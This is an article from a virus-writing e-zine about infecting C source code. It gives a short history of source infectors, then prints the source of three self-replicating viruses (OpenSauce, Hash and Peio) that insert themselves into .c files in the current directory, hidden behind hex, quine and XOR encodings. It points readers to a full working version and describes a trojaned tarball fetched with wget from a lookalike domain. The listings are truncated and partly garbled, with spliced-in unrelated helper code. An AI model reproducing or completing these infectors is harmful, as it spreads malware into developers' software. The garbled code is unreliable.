 
Join us now and share the malware... 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
 
Reflections  about the  Open Source  and Free  Software community  and 
their blind belief in the goodness of the source code. 
 
by zert  
 
0.- Abstract 
1.- Introduction 
2.- Precedents 
    2.1.- DOS viruses, Urphin 
    2.2.- 1994, SrcVir virus family and Die-Hard virus 
    2.3.- Compiler libraries' infectors 
    2.4.- Any scripting language virus code 
3.- Why try to infect source code? 
4.- OK, but... how? 
    4.1.- Typical scenario 
    4.2.- ASM inline approach 
    4.3.- "Quine" approach 
    4.4.- Future developments 
5.- Conclusions 
6.- Related links 
 
 
0.- Abstract 
 
In this article we'll talk about the possibilities of infecting source
code files, the precedents that exist on this subject and the future
developments that could happen.

The text is accompanied by examples in C, as "proofs of concept" of
the details explained. Besides, other techniques for developing source
code viruses will be presented from a less practical point of view,
showing the main steps for programming them.
 
 
1.- Introduction 
 
As the famous Free Software Foundation song [1] says, nowadays a lot
of people are joining the Free Software movement or other (more
commercial) variants such as the Open Source movement. The title of
this article is a wink at the song's chorus ("Join us now and share
the software, you'll be free, hackers, you'll be free..."), pointing
out that the distribution capacity that source code has gained in
these kinds of environments could be used to hand out viral code once
again.
 
Many of us are starting to develop an almost blind faith in the
developers of open source programs: because the code is visible, it
should be much more difficult to be cheated, and the possibility of
inserting unwanted effects into these programs should be reduced. If
we think about it, when we go to a magic show, many of the tricks need
a curtain, a wall or something to hide how we are being fooled, but
there are many other tricks that are done right in front of our faces,
using nothing but the hands, and even so we fall for them and believe
them. Something similar could happen with open source programs: the
code is there and everybody can see and examine it; however, only a
very few do it (who has audited the *whole* code that is running on
his box?). Besides, it is sometimes possible to obfuscate the code to
make it very difficult to understand, and so to insert hidden elements
not wanted by the user of that code.
 
Source code viruses have never been a real threat, basically because,
until recently, exchanging programs as source code was something very
unusual outside a very geeky environment. Viruses have had their
natural habitat in executable programs, typically binaries, which have
been passed from hand to hand all these years. Although P2P networks
have relaunched the massive exchange of binaries, this approach seems
to be progressively declining, and what rules right now is the
virus + worm approach, using different workstations or servers as
infection vectors.
 
Nowadays, exchanging programs as source code is no longer something
only computer freaks do. In the world of Free Software and Open
Source, this is the most common way to distribute code. Usually the
code is audited at least by its own author, although there are a lot
of myths about this. Anyway, there have been cases in which the
official FTP server was cracked and the original source code was
changed [3] [4]. On those occasions the introduced code was very
obvious, but a more subtle attack could have been tried.
 
I don't know whether in the future P2P networks will be full of
tarballs with the source code of a lot of programs, or whether
auditing source code will become an automatable task (which would open
a new battlefield between auditors and malware writers), but the
verifiable fact is that right now the exchange of source code is
increasing and, because of that, it is necessary to analyse its
suitability as an infection vector.
 
 
2.- Precedents 
 
Up to now, only a few timid infectors have been developed with the aim
of infecting source code. The reason is simple: source code was not a
good infection method until the irruption of the "open source
revolution" on the current scene.
 
 
2.1.- DOS viruses, Urphin 
 
In the distant past age of DOS viruses, the Urphin virus [5] already
thought of infecting source code as a spreading method. Its behaviour
was not strange at all: once executed, it remained resident (service
31h of int 21h), waiting for the execution of TPC.EXE (the Turbo
Pascal Compiler), and at that moment it intercepted the .PAS files,
which contain the source code of Pascal programs.
 
Once it found a .PAS file, it looked for the word "BEGIN", which
indicates the beginning of a code block in Pascal, and it added a
hexadecimal dump of its code together with the Pascal code needed to
execute it. When the file was closed, the virus removed the source
code it had just inserted, leaving the source file clean after the
executable binary had been generated.
 
 
2.2.- 1994, SrcVir virus family and Die-Hard virus 
 
On many web pages that explain the history of computer viruses [6],
the SrcVir family is mentioned. It appeared in 1994 together with a
stream of new viruses whose targets and behaviours were strange up to
that date. The aim of this virus family was mainly to infect source
code files written in C and Pascal, in a similar way to the Urphin
virus mentioned above.
 
The same year, another virus that infected source code was programmed
and released: the Die-Hard virus [7]. This virus is quite standard (a
COM and EXE infector for DOS), except for one feature: it looks for
.ASM and .PAS files, assembly and Pascal source code respectively, in
order to add a dump of its code.
 
 
2.3.- Compiler libraries' infectors 
 
There are viruses whose target is to infect OBJ and LIB files [8], in
order to add their code to modules or libraries that will later be
linked into executable code. Files infected in this way act just as
"carriers", waiting for an executable to be linked with these modules
or libraries so that the virus can go on spreading. In this scheme,
executable files do not infect other executable files themselves, so
there is no risk of self-infection and the virus code does not need to
check for it. The infected files are useless until their code is
included in an executable, remaining in a "latent" state until that
happens.
 
 
2.4.- Any scripting language virus code   
 
Obviously, any virus that is written in a scripting language and whose
target is to infect other scripts is an infector that copies its
source code into the host file. There are several approaches to this
kind of virus in Perl or shell scripts [9] [10], and countless
Internet worms written in Visual Basic Script and other scripting
languages.
 
 
3.- Why try to infect source code? 
 
As we have mentioned before, this may well be an expanding field, and
several factors point that way:
 
* The increasing interest in operating systems such as GNU/Linux and
*BSD is generating a user community whose main value is source code,
which is used as its currency. Some of these new users are far from
the original idea of a UNIX hacker, and they are less technical (using
the computer as a quite modern washing machine).
 
* The growing interest of governments and public entities in using
open source software in order to increase their security. Open source
is not in itself (inherently) more secure than closed source software
if appropriate measures are not taken. There are a lot of myths about
this [2], apart from many attempts by Microsoft to deceive the
consumer with half-truths [13].
 
* Some programs need to be compiled on each computer separately,
either because they are free software that links against proprietary
libraries or codecs, or because there can be an enormous difference
between the generic i386 version and one compiled on the specific
computer. This requires a development environment on more computers.
The paradigmatic example of this case is the MPlayer multimedia
player.
 
 
4.- OK, but... how? 
 
4.1.- Typical scenario 
 
Bob is a young sysadmin fascinated by wireless networks. His knowledge
of computer networks is advanced, but he has no idea about programming
beyond a few simple shell scripts.
 
During a very enjoyable wardriving evening, while he and his friend
Dave are listening to Massive Attack and prowling among the routers of
a local company, Bob is astonished by the great program that Dave has
for scanning wireless networks. Eager, he asks him for the URL to
download it without further delay:
 
wget http://packetstormsecurify.nl/sniffers/wireless/wlanthrax-0.6.9.tar.gz 
tar xzf wlanthrax-0.6.9.tar.gz 
cd wlanthrax-0.6.9 
./configure 
make 
make install 
 
(advisory: http://packetstormsecurify.nl doesn't exist, but it could
be bought at a reasonable price. Any resemblance to a coincidence is
the real truth)
 
Yeah! The program is working and the networks are surrendering like
scared rats, tons of adrenaline, like in the old times! What poor Bob
doesn't know is that this tarball contained malware, and now he has it
running through the digital veins of his laptop.
 
The same thing had happened to Bob before, and since then he never
does this as the root user. Obviously, the "make install" command
won't work as a normal user, but the tool will still be executable and
usable. Clever boy, but even from a normal user account we could try
to infect all the source code that we can reach with those privileges,
which can be enough.
 
Do you think this situation is improbable? How many times have we done 
tar xzf && ./configure && make  && make install blindly? I admit  that 
sometimes I've installed software in that way O;-D 
 
 
4.2.- ASM inline approach 
 
Every virus coder knows reverse engineering tools that provide
high-quality disassemblies. Names like IDA disassembler, or even the
disassembly view mode of HIEW (Hacker's View), quickly come to my
mind. The UNIX port of HIEW, BIEW (which is really its "little
brother"), also supports the disassembly view, so we can easily see
the assembler source code of any program.
 
An inline ASM approach to infecting source files should implement a
small disassembler of its own code, in order to include it in the
source code file. If we take as a reference C source code as used on
GNU/Linux, we should create a disassembler for our code with AT&T
syntax, and include this code in a function:
 
int virus() 
{ 
  __asm__( 
  	"pusha\n\t" 
	"call 0x8048086\n\t" 
	[...] 
	"mov $0x1,%%eax\n\t" 
	"int $0x80" 
  ); 
} 
 
To obtain that disassembly we can follow the Free Software philosophy
and take the code that does this work from tools like BIEW or objdump.
The main problem with doing it that way is that the disassembler would
take up a very large part of our virus code, so we can discard this
and try to call those tools directly: if our aim is to infect source
code, we can suppose that the infected computer is a development
workstation which may have those tools installed. Using the "execve"
syscall in UNIX we could execute one of those tools and generate the
listing in a child process. An optimised version of this approach
would check which of the most common tools able to do this job are
present.
 
Pros: 
 
* We don't need to think too much: everything is already done, we just
have to join the pieces ;-)

* We are still programming in assembler, controlling each detail.

Cons:

* It is not exactly "discreet".

* Being assembler, we lose the inherent multiplatform nature of most
source code.
 
* The disassembly process can sometimes be too troublesome. 
 
 
4.3.- "Quine" approach 
 
A "quine" is a program that generates its own source code *without*
reading its own code. International programming championships have
been held for these peculiar proggies, all of them in an extremely
freaky atmosphere.
 
There are several ways to write quines, some very complicated and
others very elegant, but the most functional form, in my humble
opinion, is using arrays of chars. In fact, I was very surprised after
writing my first quine: when I looked at the rest, many were very
different, but the one Ken Thompson wrote was practically identical,
although a little less complicated. The main idea is to have the
source code in an array of chars, so as to be able to do the
following:
 
printf("char array[] = \"%s\";", array); 
 
With that approach we break the vicious circle that quines pose when
you want to print out your own code (doing
printf("printf(\"printf(\"... does not seem to be a good approach ;-D).
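
As a minimal sketch of that one-line idea only (it is not a complete
quine, and not the author's code), the declaration text can be built
with snprintf(). The helper name format_array_decl() is hypothetical,
and the sketch assumes the array body contains no quotes, backslashes
or newlines, since no escaping is done here.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Hypothetical helper: write the text of a C declaration for a char
 * array named "array" holding `body` into `out` (of size `outlen`).
 * Returns what snprintf() returns: the length the full text needs.
 * No escaping is done, so `body` must not contain quotes,
 * backslashes or newlines.
 */
static int format_array_decl(char *out, size_t outlen, const char *body)
{
    assert(out != NULL && body != NULL);
    return snprintf(out, outlen, "char array[] = \"%s\";", body);
}
```

The data and the code that prints it are kept apart: the string is
stored once, and the same string is then used both as the quoted
contents of the declaration and, later, as the program text itself.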
 
Some time later I discovered an authentic jewel of computer science
[11] when I saw the problem that Thompson posed in his famous talk
"Reflections on Trusting Trust", given when he received the ACM Turing
Award. It is amazing to understand the implications of that text, and
it is surprising to see an authentic guru like Ken Thompson speaking
like a malware coder };-) At the moment, the issue he explained has no
clear solution and seems to be a headache without a simple remedy
[12].
 
Well, if we focus on this main point, we can see that an array of
chars containing the code of the program is necessary. It is here
where the greatest differences can arise. Thompson created his array
char by char, in the following form:
 
char s[] = { 
        '\t', 
        '0', 
        '\n', 
        '}', 
        ';', 
        '\n', 
        '\n', 
        'm', 
        'a', 
        'i', 
        'n', 
        '(', 
        ')', 
        '\n', 
 
        ... 
 
        0 }; 
         
In my initial approach I saw that this, in addition to being quite
strange, was too obvious: it clearly shows that the content of the
array is source code written in C. Because of that, I used another
notation to store each char in a less obvious way:
 
char s[] = { 
0x6D, 0x61, 0x69, 0x6E, 0x28, 0x29, 0x20, 0x7B, 
0x0D, 0x0A, 0x69, 0x6E, 0x74, 0x20, 0x69, 0x3B, 
0x0D, 0x0A, 0x09, 0x70, 0x72, 0x69, 0x6E, 0x74, 
0x66, 0x28, 0x22, 0x63, 0x68, 0x61, 0x72, 0x20, 
 
... 
 
0 }; 
 
The immediate goal was fulfilled: this does not look like C source
code to the eyes of somebody unfamiliar with the ASCII table.
Nevertheless, this way of defining the array increased the size of the
code too much, so it was necessary to think of a way to reduce it. The
first thing I thought of was to double the space used in the
executable code but halve the space used in the source code, creating
an array like this one:
 
char s[] = "6D61696E2829207B0D0A69..."; 
 
Doing it this way I use much less space in the C source code. The bad
news is that now I use 2 bytes to represent each char within my array
(damn!!). We cannot use printf() to print that array into the host
code; we must do something similar to this:
 
int i; 
char nibblechar, nibble[2]; 
 
for(i=0;i 
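
As a minimal sketch of the decoding step just described (not the
author's original loop, which is incomplete in this copy of the text),
a string of hexadecimal digit pairs can be turned back into bytes as
follows. The names hex_value() and hex_decode() are hypothetical
helpers introduced only for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: value of one hex digit, or -1 if invalid. */
static int hex_value(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * Hypothetical helper: decode pairs of hex digits from `hex` into
 * `out`. Writes at most `outlen` bytes and returns the number of
 * bytes written, or -1 if the input has odd length, contains an
 * invalid digit, or does not fit in `out`.
 */
static long hex_decode(const char *hex, unsigned char *out, size_t outlen)
{
    size_t n, i;

    assert(hex != NULL && out != NULL);
    n = strlen(hex);
    if (n % 2 != 0 || n / 2 > outlen)
        return -1;
    for (i = 0; i < n; i += 2) {
        int hi = hex_value(hex[i]);
        int lo = hex_value(hex[i + 1]);

        if (hi < 0 || lo < 0)
            return -1;
        /* High nibble first, as in "6D" -> 0x6D -> 'm'. */
        out[i / 2] = (unsigned char)((hi << 4) | lo);
    }
    return (long)(n / 2);
}
```

Decoding the first eight pairs of the array shown earlier,
"6D61696E2829207B", gives the eight characters "main() {".
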
<-opensauce.c---------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
/* 
 * OpenSauce 
 * 
 * A trial to infect source code 
 *                   zert  
 * 
 */ 
 
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
 
void virus(); 
 
int main(int argc, char *argv[]) { 
  virus(); 
} 
 
void virus() { 
  int i, hd, fd, readbyte, writebyte, posmain, posbuffer; 
  DIR *dd; 
  struct dirent *dirp; 
  char nibble[2], nibblechar, *readbuffer, *writebuffer, 
       *readmain, *writemain, *bufname, *buffer; 
  char charinclude[] = "23696e636c756465203c737464696f2e683e0a23696e636c756465203c7374646c69622e683e0a23696e636c756465203c7379732f737461742e683e0a23696e636c756465203c756e697374642e683e0a23696e636c756465203c66636e746c2e683e0a23696e636c756465203c74696d652e683e0a23696e636c756465203c646972656e742e683e0a23696e636c756465203c656c662e683e0a23696e636c756465203c7379732f74797065732e683e0a23696e636c756465203c7379732f776169742e683e0a0a766f696420766972757328293b0a0a"; 
  char charvirus[] = "0a766f69642076697275732829207b0a2020696e7420692c2068642c2066642c2072656164627974652c207772697465627974652c20706f736d61696e2c20706f736275666665723b0a2020444952202a64643b0a202073747275637420646972656e74202a646972703b0a202063686172206e6962626c655b325d2c206e6962626c65636861722c202a726561646275666665722c202a77726974656275666665722c200a202020202020202a726561646d61696e2c202a77726974656d61696e2c202a6275666e616d652c202a6275666665723b0a"; 
  char charvirusend[] = "0a20206464203d206f70656e64697228222e22293b0a20207768696c65282864697270203d207265616464697228646429293e3029200a202020206966282868643d6f70656e28646972702d3e645f6e616d652c204f5f524457522c203029293e3d3029207b0a ... "; 
 
  /* scan for hosts in current dir */ 
  dd = opendir("."); 
  while((dirp = readdir(dd))>0) 
      if((fd=open(dirp->d_name, O_RDWR, 0))>=0) { 
        /* is a C source file? */ 
        if(!(strcmp(dirp->d_name+strlen(dirp->d_name)-2,".c"))|| 
           !(strcmp(dirp->d_name+strlen(dirp->d_name)-2,".C"))) { 
          /* searching infection mark... */ 
          lseek(fd, -30, SEEK_END); 
          bufname = (char *)malloc(30); 
          readbyte = read(fd, bufname,30); 
          if((strstr(bufname, "/* sauce! */")<=0)) { 
            /* infection mark not found */ 
            /* searching main() function... */ 
            lseek(fd, 0, SEEK_SET); 
            posmain = posbuffer = 0; 
            buffer = (char *)malloc(1024); 
            while((readbyte=read(fd,buffer,1024))>0) { 
              if( ((posbuffer=(int)strstr(buffer,"\nmain("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nint main("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nvoid main("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nmain ("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nint main ("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nvoid main ("))>0) ) { 
                break; 
              } 
              posmain += readbyte; 
            } 
            if(posbuffer>0) { 
              posmain += ((int)posbuffer-(int)buffer); 
              lseek(fd, posmain, SEEK_SET); 
              read(fd, buffer, 80); 
              if((posbuffer = (int)strstr(buffer,"{\n"))>0) 
                posmain += 2 + ((int)posbuffer-(int)buffer); 
              else 
                posmain = -1; 
            } else posmain = -1; 
            if(posmain>0) { 
              /* let's infect! */ 
              lseek(fd, 0, SEEK_SET); 
              writebyte = strlen(charinclude) / 2; 
              readbuffer = (char *)malloc(writebyte); 
              writebuffer = (char *)malloc(writebyte); 
              writebuffer = (char *)malloc(writebyte); 
              for(i=0;i0) { 
                lseek(fd, -readbyte, SEEK_CUR); 
                write(fd, writebuffer, writebyte); 
                writebyte = read(fd, writebuffer, writebyte); 
                lseek(fd, -writebyte, SEEK_CUR); 
                write(fd, readbuffer, readbyte); 
              } 
              lseek(fd,-readbyte,SEEK_CUR); 
              write(fd,writebuffer,writebyte); 
              /* call virus from main() */ 
              writebyte = strlen(charinclude) / 2; 
              lseek(fd, posmain+writebyte, SEEK_SET); 
              writebyte = strlen("\n  virus();\n"); 
              readmain = (char *)malloc(writebyte); 
              writemain = (char *)malloc(writebyte); 
              strcpy(writemain,"\n  virus();\n"); 
              while((readbyte=read(fd,readmain,writebyte))>0) { 
                lseek(fd,-readbyte,SEEK_CUR); 
                write(fd,writemain,writebyte); 
                writebyte=read(fd,writemain,writebyte); 
                lseek(fd,-writebyte,SEEK_CUR); 
                write(fd,readmain,readbyte); 
              } 
              lseek(fd,-readbyte,SEEK_CUR); 
              write(fd,writemain,writebyte); 
              /* copy virus function at EOF */ 
              lseek(fd, 0, SEEK_END); 
              for(i=0;i 
<-end of opensauce.c--------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
The code is not a jewel of programming science, but it is useful to
show what was intended and, in addition, it works (more or less). In
the "charvirusend" array many lines have been suppressed so as not to
fatten this text unnecessarily (if you want a functional version of
the code, look for it in 29a #7 e-zine). The rest of the code is quite
trivial:
 
1) Search for files in the current directory: open the directory with
opendir(), read each one of its entries with readdir() and close it
with closedir().

2) Once we have a possible victim, we check whether it is a ".c" or
".C" file, whether it has already been infected (whether it contains
the "/* sauce! */" infection mark) and whether it is a C source file
with a main() function.

3) If everything specified in the previous point holds, we proceed to
infect: copying the includes and the declaration of the virus()
function at the beginning (charinclude), adding a call to this
function within main(), and generating the virus() function at the end
of the code (using "charvirus" and "charvirusend", plus a few calls to
write() to define the arrays).

4) Once the infection is finished, we close the file and the
directory, because we infect just one file each time.

5) The virus() function ends and we return to the original code, and
everything works as it should.
 
Let's see another example of this type of virus, somewhat more
evolved:
 
<---------------------------------------------------------------------------> 
<-hash.c--------------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
/* 
 * Hash, 
 * 
 * quine-based source code infector. 
 *                   zert  
 * 
 */ 
 
#include  
#include  
#include  
#include  
#include  
#include  
 
void init_hash();  
 
int main(int argc, char *argv[]) 
{ 
	init_hash(); 
} 
 
void init_hash() 
{ 
	int i, j, fd, size, mpos, ipos, page,  
	ihole, thole, bhole, ehole; struct dirent *dir; DIR *d; 
	void *ptr; 
	char hashinc[] = "\n#include \n#include \n#include \n#include \n#include \n#include \n\nvoid init_hash();\n"; 
	char hashbeg[] = "\nvoid init_hash()\n{\n\tint i, j, fd, size, mpos, ipos, page, \n\tihole, thole, bhole, ehole; struct dirent *dir; DIR *d;\n\tvoid *ptr;\n\tchar hashinc[] = \""; 
	char hashend[] = "\tchar *buf;\n\n\td = opendir(\".\");\n\twhile((dir = readdir(d))>0)\n\t\tif(!(strcmp(dir->d_name+strlen(dir->d_name)-2,\".c\"))||\n\t\t   !(strcmp(dir->d_name+strlen(dir->d_name)-2,\".C\"))) \n\t\t\tif((fd=open(dir->d_name, O_RDWR, 0))>=0)\n\t\t\t{\n\t\t\t\tsize = lseek(fd, 0, SEEK_END);\n\t\t\t\tptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0);\n\t\t\t\tif( (!strstr(ptr,\"init_hash\")) &&\n\t\t\t\t  ( ((mpos=(int)strstr(ptr,\"\\nmain(\"))>0) ||\n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nint main(\"))>0) ||\n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nvoid main(\"))>0) || \n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nmain (\"))>0) ||\n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nint main (\"))>0) ||\n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nvoid main (\"))>0) ) )\n\t\t\t\t{\n\t\t\t\t\tmpos = (int)strstr((void *)mpos, \";\\n\");\n\t\t\t\t\tmpos -= (int)--ptr;\n\t\t\t\t\tif( !(ipos = (int)strstr(++ptr, \"#include <\")) )\n\t\t\t\t\t{\n\t\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\tpage = 3 * (int)sysconf(_SC_PAGESIZE);\n\t\t\t\t\tftruncate(fd, size+page);\n\t\t\t\t\tptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0);\n\t\t\t\t\tipos = (int)strstr(ptr, \"#include <\");\n\t\t\t\t\tipos = (int)strstr((void *)ipos, \"\\n\\n\");\n\t\t\t\t\tipos -= (int)ptr;\n\t\t\t\t\tihole = strlen(hashinc);\n\t\t\t\t\tfor(i=(size-ipos)/ihole;i>=0;i--) \n\t\t\t\t\t\tmemcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole);\n\t\t\t\t\tmemcpy(ptr+ipos, hashinc, ihole);\n\t\t\t\t\tmpos += ihole;\n\t\t\t\t\tbuf = (char *)malloc(20*sizeof(char));\n\t\t\t\t\tstrcpy(buf,\"\\n\\tinit_hash();\");\n\t\t\t\t\tthole = strlen(buf);\n\t\t\t\t\tfor(i=(size+ihole-mpos)/thole;i>=0;i--) \n\t\t\t\t\t\tmemcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole);\n\t\t\t\t\tmemcpy(ptr+mpos, buf, thole);\n\t\t\t\t\tbhole = strlen(hashbeg);\n\t\t\t\t\tmemcpy(ptr+size+ihole+thole, hashbeg, bhole);\n\t\t\t\t\tbuf = (char 
*)malloc(100*sizeof(char)+strlen(hashinc));\n\t\t\t\t\tfor(i=0,j=0;i0) 
		if(!(strcmp(dir->d_name+strlen(dir->d_name)-2,".c"))|| 
		   !(strcmp(dir->d_name+strlen(dir->d_name)-2,".C")))  
			if((fd=open(dir->d_name, O_RDWR, 0))>=0) 
			{ 
				size = lseek(fd, 0, SEEK_END); 
				ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0); 
				if( (!strstr(ptr,"init_hash")) && 
				  ( ((mpos=(int)strstr(ptr,"\nmain("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nint main("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nvoid main("))>0) ||  
				    ((mpos=(int)strstr(ptr,"\nmain ("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nint main ("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nvoid main ("))>0) ) ) 
				{ 
					mpos = (int)strstr((void *)mpos, ";\n"); 
					mpos -= (int)--ptr; 
					if( !(ipos = (int)strstr(++ptr, "#include <")) ) 
					{ 
						munmap(ptr, size); 
						break; 
					} 
					munmap(ptr, size); 
					page = 3 * (int)sysconf(_SC_PAGESIZE); 
					ftruncate(fd, size+page); 
					ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0); 
					ipos = (int)strstr(ptr, "#include <"); 
					ipos = (int)strstr((void *)ipos, "\n\n"); 
					ipos -= (int)ptr; 
					ihole = strlen(hashinc); 
					for(i=(size-ipos)/ihole;i>=0;i--)  
						memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole); 
					memcpy(ptr+ipos, hashinc, ihole); 
					mpos += ihole; 
					buf = (char *)malloc(20*sizeof(char)); 
					strcpy(buf,"\n\tinit_hash();"); 
					thole = strlen(buf); 
					for(i=(size+ihole-mpos)/thole;i>=0;i--)  
						memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole); 
					memcpy(ptr+mpos, buf, thole); 
					bhole = strlen(hashbeg); 
					memcpy(ptr+size+ihole+thole, hashbeg, bhole); 
					 
					/* array declarations and arrays */ 
					buf = (char *)malloc(100*sizeof(char)+strlen(hashinc)); 
					for(i=0,j=0;i 
<-end of hash.c-------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
In this example, hashes are in plain text and correspond to the format
strings needed to generate each line of code for the infection. In
spite of their size, hashes will occupy considerably less within the
executable program, because each escape sequence is reduced to one
byte. On the other hand, we have to include the code needed to
regenerate the two chars that make up each escape sequence
(translating just '\t', '\n', '\\' and '\"').
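
The translation mentioned above is ordinary C string-literal escaping.
As a minimal, generic sketch of it (the helper name escape_c_string()
is hypothetical and is not taken from the Hash listing), each of the
four characters is written back as a backslash followed by one letter
or symbol:

```c
#include <assert.h>
#include <stddef.h>

/*
 * Hypothetical helper: copy `src` into `dst`, writing tab, newline,
 * backslash and double quote as two-character C escape sequences.
 * Returns the length written (excluding the terminating NUL), or -1
 * if `dst` (of size `dstlen`) is too small.
 */
static long escape_c_string(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;

    assert(src != NULL && dst != NULL);
    if (dstlen == 0)
        return -1;
    for (; *src != '\0'; src++) {
        char e = 0;   /* second char of the escape, 0 if none needed */

        switch (*src) {
        case '\t': e = 't';  break;
        case '\n': e = 'n';  break;
        case '\\': e = '\\'; break;
        case '"':  e = '"';  break;
        }
        /* Keep one byte free for the terminating NUL. */
        if (o + (e ? 2 : 1) >= dstlen)
            return -1;
        if (e) {
            dst[o++] = '\\';
            dst[o++] = e;
        } else {
            dst[o++] = *src;
        }
    }
    dst[o] = '\0';
    return (long)o;
}
```

This is why the plain-text arrays look so much longer in the source
than they are in memory: every escaped character costs two characters
in the source file but only one byte in the compiled program.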
 
All the remaining code consists of byte copies within the memory
region where the file is mapped, using memcpy(). The use of mmap() and
memcpy() instead of repeated read(), write() and lseek() calls speeds
up the modification of files enormously.
 
Finally, the "Peio" infector uses the same techniques as "Hash", but
in this case the hashes are XORed, so escape characters like '\t' or
'\n' can be stored without having to be written out explicitly. This
way, the size of the hash array is reduced considerably, and the code
that translates each escape character into two bytes is no longer
needed.
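
To illustrate only the encoding property described here, the following
sketch XORs every byte of a buffer with a fixed key. The key 0x80 is
the value the text gives further on for Peio; the names xor_buffer()
and contains_byte() are hypothetical helpers, not taken from the
original listing. The sketch assumes the input is 7-bit ASCII, so
every encoded byte has its top bit set.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: XOR `len` bytes of `buf` in place with `key`. */
static void xor_buffer(unsigned char *buf, size_t len, unsigned char key)
{
    size_t i;

    assert(buf != NULL);
    for (i = 0; i < len; i++)
        buf[i] ^= key;
}

/* Returns 1 if `c` occurs in the first `len` bytes of `buf`, else 0. */
static int contains_byte(const unsigned char *buf, size_t len,
                         unsigned char c)
{
    size_t i;

    assert(buf != NULL);
    for (i = 0; i < len; i++)
        if (buf[i] == c)
            return 1;
    return 0;
}
```

With ASCII input, characters such as '\n', '\\' or '"' no longer
appear in the encoded data, and applying the same operation a second
time restores the original bytes.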
 
<---------------------------------------------------------------------------> 
<-peio.c--------------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
/* 
 * Peio, 
 *     
 * source code infector XORing hashes. 
 *                   zert  
 * 
 */ 
 
#include  
#include  
#include  
#include  
#include  
#include  
 
void init_hash();  
 
int main(int argc, char *argv[]) 
{ 
	init_hash(); 
} 
 
void init_hash() 
{ 
	int i, j, fd, size, mpos, ipos, page,  
	ihole, thole, bhole, ehole; struct dirent *dir; DIR *d; 
	void *ptr; 
	char hashinc[] = "Š£éîãìõäå 1/4óôäéï(r)è3/4Š£éîãìõäå 1/4óùó¯óôáô(r)è3/4Š£éîãìõäå 1/4óùó¯ííáî(r)è3/4Š£éîãìõäå 1/4õîéóôä(r)è3/4Š£éîãìõäå 1/4äéòåîô(r)è3/4Š£éîãìõäå 1/4æãîôì(r)è3/4ŠŠöïéä éîéôßèáóè¨(c)" Š"; 
	char hashbeg[] = "Šöïéä éîéôßèáóè¨(c)ŠûЉéîô é¬ ê¬ æä¬ óéúå¬ íðïó¬ éðïó¬ ðáçå¬ Š‰éèïìå¬ ôèïìå¬ âèïìå¬ åèïìå" óôòõãô äéòåîô ªäéò" ÄÉÒ ªä"Љöïéä ªðôò"Љãèáò èáóèéîãÛÝ 1/2 ¢"; 
